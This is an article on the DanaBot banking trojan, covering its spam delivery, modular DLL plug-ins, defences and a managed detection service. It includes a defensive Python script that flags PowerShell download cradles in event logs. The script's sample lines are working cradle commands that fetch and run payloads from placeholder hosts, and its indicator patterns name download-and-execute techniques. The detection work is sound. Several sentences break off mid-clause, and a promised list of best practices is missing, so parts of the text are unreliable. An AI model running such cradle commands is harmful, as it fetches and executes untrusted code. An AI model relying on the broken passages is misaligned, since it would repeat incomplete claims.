Security researchers from ESET recently discovered a banking trojan named DanaBot (detected by Trend Micro as TROJ_BANLOAD.THFOAAH) being distributed to European countries via spam emails. Here’s what you need to know about this threat, how users and businesses can defend against it, and how managed detection and response can help address this threat.
DanaBot is a banking trojan, written in Delphi programming language, capable of stealing credentials and hijacking infected systems. It is distributed via spam emails masquerading as invoices with
When it was first discovered, DanaBot used Word documents embedded with
DanaBot was first seen being distributed to Australian users via spam with a malicious Word document that claims the user is “protected” by a security company. DanaBot’s command-and-control (C&C) server first checks the affected system’s IP
DanaBot’s operators have since expanded their targets. The recent spam campaigns are now being distributed to European countries, particularly Austria, Germany, Italy, Poland, and Ukraine. While the missives still pose as invoices, PowerShell and BrushaLoader are used to download DanaBot’s various components.
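Spam-delivered loaders of the kind described above typically rely on a PowerShell "download cradle" (fetch a payload over HTTP, then run it, often hidden behind an encoded command line). The script below is an added defensive example written for this page, not code from the article, ESET or Trend Micro: it scans PowerShell script block log text (the kind Windows records as Event ID 4104 when Script Block Logging is enabled) for such cradles, decodes `-EncodedCommand` payloads before matching, and extracts the URLs. The five sample entries are constructed for the example and are not the actual commands used by the DanaBot campaign; the indicator list and verdict thresholds are the author's own assumptions, to be tuned against your environment's baseline.

```python
import base64
import re

# Constructed sample script block texts (Event ID 4104 style). These are
# made-up examples for this article, NOT commands observed in DanaBot spam.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users -Recurse | Select-Object Name",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/inv.ps1')",
    "powershell -nop -w hidden -enc " + base64.b64encode(
        "(New-Object Net.WebClient).DownloadFile("
        "'http://example.invalid/a.dll','C:\\Users\\Public\\a.dll')".encode("utf-16le")
    ).decode("ascii"),
    "Invoke-WebRequest -Uri https://updates.example.invalid/patch.msi -OutFile $env:TEMP\\patch.msi",
    "Write-Host 'hello'",
]

# Indicator names -> regexes. Assumed list; extend with what your own telemetry shows.
DOWNLOAD_INDICATORS = {
    "DownloadString": r"DownloadString\s*\(",
    "DownloadFile": r"DownloadFile\s*\(",
    "Invoke-WebRequest": r"Invoke-WebRequest|\biwr\b",
    "Start-BitsTransfer": r"Start-BitsTransfer",
}
EXEC_INDICATORS = {
    "Invoke-Expression": r"Invoke-Expression|\bIEX\b",
}

# PowerShell accepts abbreviated forms of -EncodedCommand (-e, -ec, -en, -enc ...).
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"\)]+", re.IGNORECASE)


def decode_encoded_command(text):
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(text):
    """Classify one script block as clean / medium / high and extract evidence."""
    decoded = decode_encoded_command(text)
    # Match against both the raw text and the decoded payload so an encoded
    # cradle is not missed just because the base64 hides the keywords.
    target = text if decoded is None else text + "\n" + decoded
    download_hits = [n for n, p in DOWNLOAD_INDICATORS.items() if re.search(p, target, re.IGNORECASE)]
    exec_hits = [n for n, p in EXEC_INDICATORS.items() if re.search(p, target, re.IGNORECASE)]
    urls = URL_RE.findall(target)

    # Assumed scoring: fetch + (execute or obfuscation) is the classic cradle shape.
    if download_hits and (exec_hits or decoded is not None):
        verdict = "high"
    elif download_hits or exec_hits or decoded is not None:
        verdict = "medium"
    else:
        verdict = "clean"

    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "download_hits": download_hits,
        "exec_hits": exec_hits,
        "urls": urls,
        "verdict": verdict,
    }


def scan(blocks):
    """Analyze a list of script block texts; return (index, verdict, urls) for non-clean ones."""
    findings = []
    for i, block in enumerate(blocks):
        r = analyze(block)
        if r["verdict"] != "clean":
            findings.append((i, r["verdict"], r["urls"]))
    return findings


if __name__ == "__main__":
    for idx, verdict, urls in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {verdict} urls={urls}")
```

Running the script flags the IEX/DownloadString cradle and the encoded DownloadFile command as high and the plain Invoke-WebRequest as medium, while the directory listing and Write-Host lines stay clean. In production you would feed it the ScriptBlockText field from your SIEM rather than the constructed list, and review the medium hits against known-good update scripts before alerting on them.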
DanaBot is notable for its multistage infection chain and modular architecture. Prior research from Trustwave, along with ESET's new research, identifies DanaBot as comprising several components, mostly dynamic-link libraries (DLLs), that perform separate functions. The identified plug-ins steal credentials from various applications, provide RDP (Remote Desktop Protocol) access to other Windows-based computers, and inject scripts into browsers, among other functions.
While modular malware isn’t new, it can pose significant risks given its stealthy nature. The technique is increasingly used by botnets, other information and file stealers, Android malware, point-of-sale (PoS) malware, and even cyberespionage campaigns. Modular malware can be difficult to detect. For instance, a module can be programmed to stay dormant or terminate unless another module is running, so a component can dwell within an affected system for a long time before it is executed. Attackers can also program a module to execute on its own without relying on other components; in this case, the malware can carry out information theft while its other components, with other functionalities, remain hidden. Uncovering one component doesn’t guarantee the others can be found either.
Defending against modular malware like DanaBot requires a multilayered approach. Here are some best practices:
Ideally, businesses should have the necessary security mechanisms in place to defend against stealthy threats, but enterprises may find this arduous given budget constraints (such as in hiring or retaining security specialists) or the worsening cybersecurity skills gap. A security strategy that enterprises can consider is managed detection and response (MDR), which provides comprehensive threat hunting services and access to security specialists who can help enterprises investigate, proactively respond to, and remediate evasive threats.
For example, detecting or blocking one of a modular malware’s components doesn’t ensure that its other plug-ins can be found. In a modular PoS malware like FastPOS, for instance, its RAM (random access memory)-scraping module can run as a service
Trend Micro’s managed detection and response service allows customers to investigate security alerts without the need to hire qualified incident response staff. It provides alert monitoring, alert prioritization, investigation, and threat hunting services to Trend Micro customers. By applying artificial intelligence models to customer endpoint data, network data, and server information, the service can correlate and prioritize advanced threats. Trend Micro threat researchers can investigate prioritized alerts to determine the extent and spread of the attack and work with the customer to provide a detailed remediation plan.